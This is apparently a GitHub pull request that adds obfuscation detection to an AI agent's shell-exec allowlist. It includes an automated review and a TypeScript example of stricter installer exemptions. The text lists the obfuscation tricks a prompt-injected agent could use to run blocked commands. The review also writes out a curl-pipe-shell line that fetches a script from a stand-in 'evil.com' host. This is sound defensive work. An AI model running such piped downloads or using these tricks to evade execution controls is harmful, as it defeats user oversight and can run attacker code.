
#16907: fix(security): detect obfuscated commands that bypass allowlist filters

by CornBrother0x, open, 2026-02-15 07:20
## Summary

- **Problem:** The exec tool's allowlist can be bypassed using shell obfuscation (base64 encoding, hex escapes, variable expansion, `curl | sh` piping) to execute blocked commands
- **Why it matters:** A prompt-injected LLM can run arbitrary commands the user explicitly blocked
- **What changed:** Added `detectCommandObfuscation()` as a pre-allowlist gate that detects obfuscation patterns and forces user approval
- **What did NOT change:** Existing allowlist behavior is untouched — this only adds a new check before allowlist evaluation

Closes #8592

## Changes

**`src/infra/exec-obfuscation-detect.ts`** (new):
- Detection module with pattern matchers for base64, hex/octal, variable expansion, brace expansion, `curl | sh`, Unicode smuggling
- Known-good installer exemptions (Homebrew, rustup, nvm, pnpm, bun) to avoid false positives

**`src/agents/bash-tools.exec.ts`**:
- Integrated `detectCommandObfuscation()` call before allowlist evaluation in both gateway and node execution paths

**`src/infra/exec-obfuscation-detect.test.ts`** (new):
- 33 unit tests covering all detection patterns, edge cases, and false positive suppression

## Security Impact

- Command/tool execution surface changed? Yes — adds a detection gate before allowlist eval
- Only adds restrictions, never loosens. False positives mitigated by known-good installer exemptions.

## Testing

All 33 tests pass locally (macOS, Node.js v25.6.0). Covers:
- Base64/hex/octal encoding bypass
- Variable expansion (`$'cmd'`)
- Curl-pipe-shell patterns
- Multi-layer obfuscation
- Known-good installer exemptions (no false positives)

## Compatibility

Backward compatible — default behavior unchanged, only adds approval prompt for detected obfuscation.

## Failure Recovery

Revert the single commit. Detection module is isolated — no other code depends on it except the two integration points in `bash-tools.exec.ts`.

## AI Disclosure

AI-assisted (Claude via OpenClaw). All code reviewed, understood, and tested.
### Greptile Summary

Adds a `detectCommandObfuscation()` pre-allowlist gate that detects common shell obfuscation patterns (base64 decode, hex escapes, `curl | sh`, eval with encoding, variable expansion, etc.) and forces user approval when triggered. The detection module is well-structured and the integration into both gateway and node execution paths in `bash-tools.exec.ts` is clean.

- **Suppression piggybacking vulnerability**: The false-positive suppression regexes for known-good installers (rustup, nvm, Homebrew, etc.) match the known-good URL *anywhere* in the command string. An attacker can include a known-good URL alongside a malicious one (e.g., `curl https://sh.rustup.rs https://evil.com/bad.sh | sh`) to suppress `curl-pipe-shell` detection while still executing malicious content.
- **Homebrew suppression test is vacuous**: The canonical Homebrew install command uses `$(curl ...)` command substitution, not a pipe. The `curl-pipe-shell` detection regex never matches it, so the suppression logic is never exercised. The test passes for the wrong reason.
- Good test coverage overall with 33 tests covering detection patterns, edge cases, and false positive suppression.

### Confidence Score: 3/5

- The PR adds a useful security layer but the suppression mechanism has a bypass that should be addressed before merge.
- The core detection logic is sound and the integration is clean, but the false-positive suppression can be piggybacked by including a known-good URL alongside a malicious one, which undermines the security intent. The Homebrew suppression test also passes vacuously. These are addressable issues but warrant fixes before merging a security-focused change.
- Pay close attention to `src/infra/exec-obfuscation-detect.ts` — the suppression regexes need tightening to prevent piggybacking attacks.

Last reviewed commit: c86646d
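The two review points above (suppression piggybacking, and the Homebrew test never reaching the suppression branch), worked as an added TypeScript example that is not code from PR #16907 or the project: a naive "known-good URL anywhere in the string" suppression beside a tightened rule that exempts a curl-pipe-shell only when every URL the command fetches parses, host and path, to an allowlist entry. The allowlist, regexes and function names are constructed for the example and hypothetical.

```typescript
// Added example, not code from PR #16907. It contrasts the "known-good URL
// anywhere in the command" suppression the review flags with a tightened rule:
// exempt only if every fetched URL resolves, host and path, to the allowlist.

// Constructed allowlist: exact host plus path prefix, never a substring match.
const KNOWN_GOOD_INSTALLERS: Array<{ host: string; pathPrefix: string }> = [
  { host: "sh.rustup.rs", pathPrefix: "/" },
  { host: "raw.githubusercontent.com", pathPrefix: "/nvm-sh/nvm/" },
  { host: "get.pnpm.io", pathPrefix: "/install.sh" },
  { host: "bun.sh", pathPrefix: "/install" },
];

// curl/wget ... | [sudo] sh|bash|zsh|dash: a pipe, not $(...) substitution.
const CURL_PIPE_SHELL = /\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/;
// Every http(s) URL token on the command line.
const URL_TOKEN = /https?:\/\/[^\s'"|;&()]+/g;
// Strict URL shape: https, host, optional port, path, optional query/fragment,
// then end of string, so userinfo tricks like https://good@evil.com do not parse.
const URL_SHAPE = /^https:\/\/([a-z0-9.-]+)(?::\d+)?(\/[^?#]*)?(?:[?#].*)?$/i;

function isKnownGoodUrl(raw: string): boolean {
  const m = URL_SHAPE.exec(raw);
  if (!m) return false;
  const host = (m[1] || "").toLowerCase();
  const path = m[2] || "/";
  return KNOWN_GOOD_INSTALLERS.some(
    (g) => host === g.host && path.indexOf(g.pathPrefix) === 0,
  );
}

// The suppression shape the review objects to: a known-good host anywhere.
function naiveSuppression(cmd: string): boolean {
  return KNOWN_GOOD_INSTALLERS.some((g) => cmd.indexOf("https://" + g.host) !== -1);
}

// Tightened: at least one URL, and every URL must be known-good.
function strictSuppression(cmd: string): boolean {
  const urls: string[] = cmd.match(URL_TOKEN) || [];
  return urls.length > 0 && urls.every(isKnownGoodUrl);
}

function matchesCurlPipeShell(cmd: string): boolean {
  return CURL_PIPE_SHELL.test(cmd);
}

// True when the command should be routed to user approval.
function flagsCurlPipeShell(cmd: string, suppress: (c: string) => boolean): boolean {
  return matchesCurlPipeShell(cmd) && !suppress(cmd);
}
```

With the strict rule the piggybacked command from the review is flagged while the plain rustup installer stays exempt; the Homebrew `$(curl ...)` form never matches the pipe regex at all, which is why a suppression test built on it proves nothing.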
